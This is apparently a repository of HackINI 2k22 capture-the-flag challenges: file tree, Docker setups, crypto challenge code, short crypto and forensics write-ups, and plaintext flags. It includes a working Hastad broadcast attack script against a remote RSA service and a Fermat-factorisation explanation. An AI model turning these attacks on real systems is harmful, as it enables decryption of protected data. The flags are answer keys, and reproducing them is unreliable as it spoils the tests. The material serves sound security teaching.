├── README.md ├── crypto ├── 1by1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge.zip │ ├── challenge │ │ └── challenge.py │ ├── docker-compose.yml │ ├── entrypoint.sh │ ├── requirements.txt │ └── solution │ │ └── solve.py ├── NightCoder │ ├── README.md │ ├── challenge.py │ ├── challenge.yml │ └── solution │ │ └── README.md ├── README.md ├── RSimple │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── RSimple.py │ │ ├── entrypoint.sh │ │ └── flag.py │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── sol.py ├── Steam_Locomotive │ ├── README.md │ ├── challenge.yml │ ├── enc │ └── solution │ │ └── README.md └── neighbors │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── chall │ ├── challenge.py │ └── flag │ └── solution │ ├── README.md │ └── solve.py ├── forensics ├── Backup_1 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ ├── README.md │ │ ├── decipher.png │ │ └── rot13.png ├── Backup_2 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ ├── README.md │ │ ├── oletool.png │ │ └── pptm.png ├── Investigator_1 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── Investigator_2 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── Investigator_3 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── README.md ├── Smurf │ ├── README.md │ ├── challenge.yml │ ├── smurf.pcapng │ └── solution │ │ ├── README.md │ │ ├── id.png │ │ └── rickroll.png ├── agentDNS │ ├── README.md │ ├── capture.pcapng │ ├── challenge.yml │ └── solution │ │ └── README.md ├── ezCap │ ├── README.md │ ├── challenge.yml │ ├── ezCap.pcapng │ └── solution │ │ ├── README.md │ │ ├── filter1.png │ │ └── flag.png └── lies │ ├── README.md │ ├── challenge.yml │ ├── pic.jpeg │ └── solution │ └── README.md ├── jail ├── JsandboxS │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── .passwd │ │ ├── entrypoint.sh │ │ └── script.js │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── README.md ├── baby-jail1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── baby-jail2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── correct │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.py │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ ├── wrapper │ │ └── wrapper.c │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── escape │ ├── challenge.yml │ └── solution │ │ └── README.md ├── less_jail │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── fakeflag │ │ ├── my_less │ │ ├── perms │ │ └── real_flag │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── pickle-games-1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── solve.py ├── pickle-games-2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.py │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── solve.py ├── pickle-games-3 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.py │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── solve.py ├── pyjail │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ └── README.md └── pyjail2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── chall.py │ ├── flag.txt │ ├── sshd_config │ └── sudoers │ ├── docker-compose.yml │ └── solution │ └── README.md ├── linux ├── README.md ├── diff │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── flag.txt │ │ ├── sshd_config │ │ └── sudoers │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── images │ │ ├── cap1.png │ │ ├── cap2.png │ │ ├── cap3.png │ │ └── cap4.png ├── loca-loca-1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── client.py │ │ ├── entrypoint.sh │ │ ├── flag.runme │ │ └── server.py │ ├── docker-compose.yml │ ├── requirements.txt │ └── solution │ │ └── README.md ├── loca-loca-2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── client.py │ │ ├── entrypoint.sh │ │ ├── flag.runme │ │ └── server.py │ ├── docker-compose.yml │ ├── requirements.txt │ └── solution │ │ └── README.md ├── nutshell1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag │ │ └── nutshell1 │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── nutshell2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag │ │ └── nutshell2 │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── nutshell_supreme │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag │ │ └── nutshell_supreme │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── remote │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── .bashrc │ │ ├── flag.txt │ │ └── sshd_config │ ├── docker-compose.yml │ └── solution │ │ └── README.md └── welcome │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── 01-custom │ ├── sshd_config │ └── sudoers │ ├── docker-compose.yml │ └── solution │ ├── README.md │ └── images │ ├── cap1.png │ └── cap2.png ├── misc ├── Alien │ ├── Alien.png │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── Enigma │ ├── README.md │ ├── challenge.yml │ └── solution │ │ ├── README.md │ │ ├── blue.png │ │ ├── etcetra.png │ │ ├── flag.png │ │ ├── gimp.png │ │ ├── lock.png │ │ ├── morse.png │ │ └── vig.png ├── README.md ├── hello_word │ ├── README.md │ ├── challenge.yml │ ├── presentation.docx │ └── solution │ │ └── README.md └── imageData │ ├── README.md │ ├── challenge.yml │ ├── imageData.json │ └── solution │ └── README.md ├── programming ├── README.md ├── RPS │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ └── entrypoint.sh │ ├── docker-compose.yml │ └── solution │ │ └── solve.py ├── chess.INI │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── .passwd │ │ ├── challenge.py │ │ └── entrypoint.sh │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── sol.py └── zero-to-hero │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── chall.py │ └── entrypoint.sh │ ├── docker-compose.yml │ └── solution │ └── solve.py ├── pwn ├── B0F0 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge │ │ ├── challenge.c │ │ ├── entrypoint.sh │ │ └── flag │ ├── docker-compose.yml │ ├── solution │ │ └── script.py │ └── src │ │ └── challenge.c ├── B0F1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge │ │ ├── challenge.c │ │ ├── entrypoint.sh │ │ └── flag │ ├── docker-compose.yml │ ├── solution │ │ └── script.py │ └── src │ │ └── challenge.c ├── README.md ├── no-way-out │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag.txt │ │ └── no-way-out │ ├── docker-compose.yml │ ├── lib │ │ ├── ld-2.27.so │ │ └── libc-2.27.so │ ├── solution │ │ └── README.md │ └── src │ │ ├── Makefile │ │ └── no-way-out.c └── stronk-boi │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── entrypoint.sh │ ├── flag.txt │ └── stronk-boi │ ├── docker-compose.yml │ ├── lib │ ├── ld-2.27.so │ └── libc-2.27.so │ ├── solution │ ├── README.md │ ├── ld-2.27.so │ ├── libc-2.27.so │ ├── libc.so.6 │ ├── solve.py │ ├── stronk-boi │ └── stronk-boi_patched │ └── src │ ├── Makefile │ └── stronk-boi.c ├── reverse ├── 6pack │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ └── challenge.exe │ ├── solution │ │ └── README.md │ └── source │ │ ├── source.c │ │ └── source.exe ├── README.md ├── baby-asm │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall │ │ ├── chall.asm │ │ ├── chall.o │ │ ├── enc │ │ └── flag.txt │ └── soultion │ │ ├── README.md │ │ └── solve.py └── magic │ ├── README.md │ ├── challenge.yml │ └── challenge │ ├── chall │ ├── chall.c │ └── pychall.py ├── warmup ├── README.md ├── my-first-ncat │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.sh │ │ └── entrypoint.sh │ └── docker-compose.yml └── my-first-ssh │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── entrypoint.sh │ ├── flag.txt │ └── sshd_config │ └── docker-compose.yml └── web ├── HEADache ├── Dockerfile ├── README.md ├── app │ ├── app.py │ ├── requirements.txt │ ├── static │ │ ├── bulma.min.css │ │ └── meme.png │ └── templates │ │ ├── css │ │ └── bulma.min.css │ │ └── index.html ├── challenge.yml ├── docker-compose.yml └── solution │ └── README.md ├── README.md ├── baby-lfi-2 ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── en.php │ ├── fr.php │ ├── index.php │ └── main.css ├── docker-compose.yml └── solution │ └── README.md ├── baby-lfi ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── en.php │ ├── fr.php │ ├── index.php │ └── main.css ├── docker-compose.yml └── solution │ └── README.md ├── challenge-creator ├── Dockerfile ├── README.md ├── app │ ├── .dockerignore │ ├── .env │ ├── dev.env │ ├── index.js │ ├── package-lock.json │ ├── package.json │ ├── views │ │ ├── pages │ │ │ └── index.ejs │ │ └── partials │ │ │ └── head.ejs │ └── visiter.js ├── challenge.yml ├── docker-compose.yml └── solution │ ├── README.md │ ├── evil.js │ └── exploit.js ├── lfi ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── en.php │ ├── fr.php │ ├── index.php │ └── main.css ├── docker-compose.yml └── solution │ └── README.md ├── nextgen-1 ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── apps │ │ ├── main-app │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ ├── static │ │ │ │ ├── js │ │ │ │ │ └── main.js │ │ │ │ └── styles │ │ │ │ │ └── css │ │ │ │ │ ├── bootstrap.min.css │ │ │ │ │ └── stylesheet.css │ │ │ └── templates │ │ │ │ ├── base.html │ │ │ │ ├── error-404.html │ │ │ │ ├── error-500.html │ │ │ │ ├── index.html │ │ │ │ └── navigation.html │ │ ├── service1 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ │ └── summary.html │ │ └── service2 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ └── summary.html │ ├── flag.txt │ ├── requirements.txt │ └── wsgi-apps.conf ├── docker-compose.yml └── solution │ ├── README.md │ └── images │ ├── cap1.png │ ├── cap2.png │ ├── cap3.png │ ├── cap4.png │ ├── cap5.png │ └── cap6.png ├── nextgen-2 ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── apps │ │ ├── main-app │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ ├── static │ │ │ │ ├── js │ │ │ │ │ └── main.js │ │ │ │ └── styles │ │ │ │ │ └── css │ │ │ │ │ ├── bootstrap.min.css │ │ │ │ │ └── stylesheet.css │ │ │ └── templates │ │ │ │ ├── base.html │ │ │ │ ├── error-404.html │ │ │ │ ├── error-500.html │ │ │ │ ├── index.html │ │ │ │ └── navigation.html │ │ ├── service1 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ │ └── summary.html │ │ └── service2 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ └── summary.html │ ├── filters │ ├── flag.txt │ ├── requirements.txt │ └── wsgi-apps.conf ├── docker-compose.yml └── solution │ ├── README.md │ └── images │ └── cap1.png ├── whois-fixed ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── index.html │ └── query.php ├── docker-compose.yml ├── flag.txt └── solution │ ├── README.md │ ├── payload_test_capture.png │ ├── php_doc_capture.png │ └── php_test_capture.png └── whois ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge ├── index.html └── query.php ├── docker-compose.yml ├── flag.txt └── solution └── README.md /README.md: -------------------------------------------------------------------------------- 1 | # HackINI 2k22 CTF 2 | 3 | ## About 4 | 5 | This repository contains CTF challenges and official write-ups for HackINI 2k22 CTF. 6 | 7 | -------------------------------------------------------------------------------- /crypto/1by1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | # Update Ubuntu image 4 | RUN apt-get update && apt-get upgrade -y 5 | 6 | # Setup challenge environment 7 | RUN apt-get install -y socat python3 python3-pip --no-install-recommends 8 | RUN python3 -m pip install pycryptodome pycryptodomex 9 | 10 | # Add new user "ctf:ctf" 11 | RUN useradd -m -d /home/ctf -s /bin/bash ctf 12 | RUN echo 'ctf:ctf' | chpasswd 13 | 14 | # Change directory to the newly created user's directory 15 | WORKDIR /home/ctf/ 16 | 17 | EXPOSE 8000 18 | 19 | COPY ./entrypoint.sh /home/ctf 20 | COPY ./challenge/challenge.py /home/ctf 21 | RUN chmod +x /home/ctf/entrypoint.sh 22 | RUN chmod +x /home/ctf/challenge.py 23 | 24 | CMD ["/home/ctf/entrypoint.sh"] 25 | -------------------------------------------------------------------------------- /crypto/1by1/README.md: -------------------------------------------------------------------------------- 1 | # 1by1 2 | 3 | **`Author:`** [m0kr4n3](https://github.com/m0kr4n3) 4 | 5 | ## Description 6 | 7 | > It is proven that with only 3 steps, we can retrieve the flag 8 | > I dare you to do it 9 | 10 | **Connect with**: nc \[host\] \[port\] 11 | 12 | [challenge.py](./challenge.zip) 13 | 14 | ## Solution 15 | 16 | Solution of the challenge can be found [here](solution/). 17 | -------------------------------------------------------------------------------- /crypto/1by1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "1by1" 2 | author: "m0kr4n3" 3 | author_link: "https://github.com/m0kr4n3" 4 | 5 | category: crypto 6 | difficulty: hard 7 | 8 | description: | 9 | > It is proven that with only 3 steps, we can retrieve the flag 10 | > I dare you to do it 11 | 12 | **Author**: m0kr4n3 13 | 14 | connection_info: ncat -v --ssl byte-by-byte.challs.shellmates.club 443 15 | 16 | 17 | value: 500 18 | type: dynamic 19 | 20 | extra: 21 | initial: 500 22 | decay: 8 23 | minimum: 50 24 | 25 | flags: 26 | - shellmates{1_h0p3_y0u_r3tr13v3d_th3_1V_4nd_3ncrypt3d_477_p0551b73_ch4r5} 27 | 28 | files: 29 | - ./challenge.zip 30 | 31 | tags: 32 | - hard 33 | 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /crypto/1by1/challenge.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/crypto/1by1/challenge.zip -------------------------------------------------------------------------------- /crypto/1by1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | 3 | services: 4 | 1by1: 5 | build: . 6 | ports: 7 | - "1337:8000" 8 | -------------------------------------------------------------------------------- /crypto/1by1/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | socat -dd -T60 TCP-LISTEN:8000,reuseaddr,fork,su=ctf EXEC:/home/ctf/challenge.py,stderr 4 | -------------------------------------------------------------------------------- /crypto/1by1/requirements.txt: -------------------------------------------------------------------------------- 1 | pycryptodome==3.14.1 -------------------------------------------------------------------------------- /crypto/NightCoder/README.md: -------------------------------------------------------------------------------- 1 | # Night Coder 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | I am a night coder, are you? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /crypto/NightCoder/challenge.py: -------------------------------------------------------------------------------- 1 | import random 2 | import datetime 3 | from secret import flag 4 | 5 | 6 | #Im a night coder, i coded this at night (thursday morning) 7 | 8 | def seed_shuffler(my_list, seed): 9 | random.seed(seed) 10 | random.shuffle(my_list) 11 | return my_list 12 | 13 | seed=int(datetime.datetime.now().strftime('%Y%m%d%H%M')) 14 | 15 | flag = [f for f in flag] 16 | enc = seed_shuffler(flag,seed) 17 | 18 | print("".join(enc)) 19 | 20 | #result at that time: "N_gs{aesD_he_3AtrsOLlh3ROT1sECRl0m}s" 21 | 22 | 23 | -------------------------------------------------------------------------------- /crypto/README.md: -------------------------------------------------------------------------------- 1 | # Crypto 2 | 3 | This directory contains challenges related to the `Crypto` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /crypto/RSimple/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | RUN /usr/local/bin/python -m pip install --upgrade pip 8 | RUN pip install gmpy2 pycryptodome 9 | 10 | COPY challenge /challenge/ 11 | 12 | WORKDIR /challenge 13 | 14 | RUN chmod +x RSimple.py entrypoint.sh 15 | 16 | ENTRYPOINT ["./entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /crypto/RSimple/README.md: -------------------------------------------------------------------------------- 1 | # RSimple 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | I created this unbreackable RSA applicstion, go ahead and try hack me 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /crypto/RSimple/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="/challenge/RSimple.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /crypto/RSimple/challenge/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = b'shellmates{who_7h0UghT_ThA7_RSa_w0ULd_B3_tHAT_3ASy_t0_BREAK}' -------------------------------------------------------------------------------- /crypto/RSimple/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | cpus: '2' 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /crypto/RSimple/solution/README.md: -------------------------------------------------------------------------------- 1 | # RSimple 2 | 3 | ## Write-up 4 | 5 | [link](https://crypto.stackexchange.com/questions/6713/low-public-exponent-attack-for-rsa?rq=1#) 6 | 7 | check the sollution script [script](./sol.py) 8 | 9 | ## Flag 10 | 11 | `shellmates{who_7h0UghT_ThA7_RSa_w0ULd_B3_tHAT_3ASy_t0_BREAK}` 12 | -------------------------------------------------------------------------------- /crypto/RSimple/solution/sol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | from gmpy2 import iroot 4 | from Crypto.Util.number import bytes_to_long, long_to_bytes, inverse 5 | import math 6 | 7 | s = remote('rsimple.challs.shellmates.club',443,ssl=True) 8 | 9 | r = 17 10 | 11 | n = [None]*r 12 | c = [None]*r 13 | t = [None]*r 14 | 15 | for i in range(r): 16 | s.recvuntil(b'>> ') 17 | s.sendline(b'3') 18 | s.recvline() 19 | p=s.recvline() 20 | n[i] = int(p.split(b' ')[6]) 21 | p = s.recvline() 22 | c[i] = int(p.split(b' ')[4][:-1].decode()) 23 | 24 | for i in range(r): 25 | N = math.prod([n[j] for j in list(set(range(r))-{i})]) 26 | t[i] = c[i]*N*inverse(N,n[i]) 27 | 28 | c = sum(t)%math.prod(n) 29 | 30 | print(long_to_bytes(iroot(c,17)[0])) 31 | 32 | s.close() 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /crypto/Steam_Locomotive/README.md: -------------------------------------------------------------------------------- 1 | # Steam Locomotive 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | I wrote a message, but a train passed and messed up with it, can you recover it? 8 | `siaaani ceusocnln ieosStsreLmvIoi tit t.rsul ltuLol_T3n7_i7}lDsly nmtosamdt orc sr h cietlyetrs nta fl. Lsad o ta oooie tsmtmslssdrcoycnet eei orfa:selae{$_$Nt$_0L$_h_o7n_f4dRC0Y psii eortewada elsd nfSmct. eei eronH y ghmse__tI7cE0_Er` 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). 13 | -------------------------------------------------------------------------------- /crypto/Steam_Locomotive/enc: -------------------------------------------------------------------------------- 1 | siaaani ceusocnln ieosStsreLmvIoi tit t.rsul ltuLol_T3n7_i7}lDsly nmtosamdt orc sr h cietlyetrs nta fl. Lsad o ta oooie tsmtmslssdrcoycnet eei orfa:selae{$_$Nt$_0L$_h_o7n_f4dRC0Y psii eortewada elsd nfSmct. eei eronH y ghmse__tI7cE0_Er -------------------------------------------------------------------------------- /crypto/Steam_Locomotive/solution/README.md: -------------------------------------------------------------------------------- 1 | # Steam Locomotive 2 | 3 | ## Write-up 4 | 5 | From the description, the sl command shows a steam locomotive on the terminal, googling train cipher gives `Rail fence cipher` 6 | 7 | ## Flag 8 | 9 | `shellmates{u$e_L$_Not_$l_t0_LI$T_7h3_con7En7_0f_4_diREC70rY}` 10 | -------------------------------------------------------------------------------- /crypto/neighbors/README.md: -------------------------------------------------------------------------------- 1 | # neighbors 2 | 3 | **`Author:`** [ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > They say it's such a rookie mistake to do. 8 | > Can you find it? 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /crypto/neighbors/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "neighbors" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | category: crypto 5 | 6 | difficulty: ez-med 7 | description: | 8 | > They say it's such a rookie mistake to do. 9 | > Can you find it? 10 | **Author** : Ouxs 11 | 12 | flags: 13 | - shellmates{F3RM47_H4S_Ju57_T0Ok_R$A_D0WN} 14 | 15 | files: 16 | - challenge/chall 17 | - challenge/challenge.py 18 | 19 | value: 500 20 | type: dynamic 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | tags: 27 | - easy/medium 28 | 29 | state: visible 30 | version: "0.1" 31 | -------------------------------------------------------------------------------- /crypto/neighbors/challenge/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from gmpy2 import next_prime 4 | from Crypto.Util import number 5 | 6 | p = number.getPrime(2048) 7 | q = next_prime(p) 8 | 9 | e = 0x10001 10 | N = p * q 11 | 12 | with open("flag", "rb") as f: 13 | flag = number.bytes_to_long(f.read()) 14 | 15 | C = pow(flag, e, N) 16 | 17 | with open("chall", "w") as f: 18 | f.write("\n".join([f"N : {N}", f"e : {e}", f"C : {C}"])) 19 | -------------------------------------------------------------------------------- /crypto/neighbors/challenge/flag: -------------------------------------------------------------------------------- 1 | shellmates{F3RM47_H4S_Ju57_T0Ok_R$A_D0WN} 2 | -------------------------------------------------------------------------------- /crypto/neighbors/solution/README.md: -------------------------------------------------------------------------------- 1 | # byte_by_byte 2 | 3 | ## Write-up 4 | 5 | If we check the source code, we can see that the way the `q` is generated is a bit weird. 6 | 7 | q is the prime number following p. With this setup, the difference between `p` and `q` is generally small. So how can we break this? 8 | 9 | This is the direct application of fermat thoerem: 10 | 11 | Since we can write every odd number in this format: `n = a^2-b^2 --> n = (a-b)*(a+b) --> p = a-b , q = a+b` 12 | 13 | If the difference between `a` and `b` is small, we can easily brute force them by choosing a value for `a` then checking if `a^2-n` is a square number. 14 | 15 | We can start with the square root of `n` 16 | 17 | ## Flag 18 | 19 | `shellmates{F3RM47_H4S_Ju57_T0Ok_R$A_D0WN}` -------------------------------------------------------------------------------- /forensics/Backup_1/README.md: -------------------------------------------------------------------------------- 1 | # Backup 1 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | 7 | Eva, a university student who is a victim of a ransomware threat, she contacted us asking for a help!. Fortunately we found a recovery point on her system, 8 | after rolling back to this point we made a full disk image for analysis. before we start a questionnaire with Eva about this accident, There is a weird document file with uncommon extension in her computer, Try to find it then decipher the hidden message. 9 | 10 | Image link: https://bit.ly/3NCyiFX 11 | ## Solution 12 | 13 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /forensics/Backup_1/solution/README.md: -------------------------------------------------------------------------------- 1 | # Backup 1 2 | 3 | ## Write-up 4 | 5 | `Users/PC/Documents/ROT.13` 6 | 7 | ![IMG](rot13.png) 8 | 9 | 10 | ![IMG](decipher.png) 11 | 12 | ## Flag 13 | 14 | `shellmates{th1s_1s_just_th3_st4rt}` 15 | -------------------------------------------------------------------------------- /forensics/Backup_1/solution/decipher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_1/solution/decipher.png -------------------------------------------------------------------------------- /forensics/Backup_1/solution/rot13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_1/solution/rot13.png -------------------------------------------------------------------------------- /forensics/Backup_2/README.md: -------------------------------------------------------------------------------- 1 | # Backup 2 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | After talking with Eva, she said " i had a homework about industry 4.0 and IoT, luckily, I found a ready presentation about it, first 7 | I checked its content, changed some slides then in the next day after turning on my PC, a text file popped up telling me to pay $1337 to decrypt my files. I don't know what to do. There are many important files on my hard drive. Please help !". 8 | Your mission as a cybersecurity analyst is to investigate and uncover evidence of this malicious attack by identifying and reporting the threat characteristics 9 | which is: 10 | - The domain name from which the ransom was downloaded: "Domain.xyz" 11 | - Ransomware's name: "name.extension" 12 | - The masqueraded name of the malware: "masqueraded.extension" 13 | 14 | >Flag format: shellmates{domain.xyz_name.extension_masqueraded.extension} 15 | 16 | ## Solution 17 | 18 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /forensics/Backup_2/solution/README.md: -------------------------------------------------------------------------------- 1 | # Backup 2 2 | 3 | ## Write-up 4 | 5 | Eva was attacked by a ransomware after downloading the slides, that means this ransom was initiated by macros. 6 | 7 | 1. Using Autopsy, extract the Powerpoint file from Downloads: 8 | 9 | ![IMG](pptm.png) 10 | 11 | 2. Examine the file using `Ole Tools`: 12 | ```code 13 | olevba industry.pptm 14 | ``` 15 | 16 | 17 | ![IMG](oletool.png) 18 | 19 | ## Flag 20 | 21 | `shellmates{H4ck3r.com_d1rT00l.exe_svchost.exe}` 22 | -------------------------------------------------------------------------------- /forensics/Backup_2/solution/oletool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_2/solution/oletool.png -------------------------------------------------------------------------------- /forensics/Backup_2/solution/pptm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_2/solution/pptm.png -------------------------------------------------------------------------------- /forensics/Investigator_1/README.md: -------------------------------------------------------------------------------- 1 | # Investigator 1 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | The headmaster's computer has been attacked! You, as professional forensic investigator did a memory dump of the attacked machine, it's now time to do the investigations! 8 | First, retrieve the username and the password of the machine. 9 | flag format: shellmates{username:password} 10 | Note: the same memory dump is required for the three Investigator challenges. 11 | Link to chall file: https://drive.google.com/file/d/1mh5HFljVskRgJ0HQxRmIBhtPxCY1GJc2/view?usp=sharing 12 | 13 | ## Solution 14 | 15 | Solution of the challenge can be found [here](solution/). 16 | -------------------------------------------------------------------------------- /forensics/Investigator_1/solution/README.md: -------------------------------------------------------------------------------- 1 | # Investigator 1 2 | 3 | ## Write-up 4 | 5 | Use the volatility famework. 6 | 7 | ## Flag 8 | 9 | `shellmates{ESI:liverpool}` 10 | 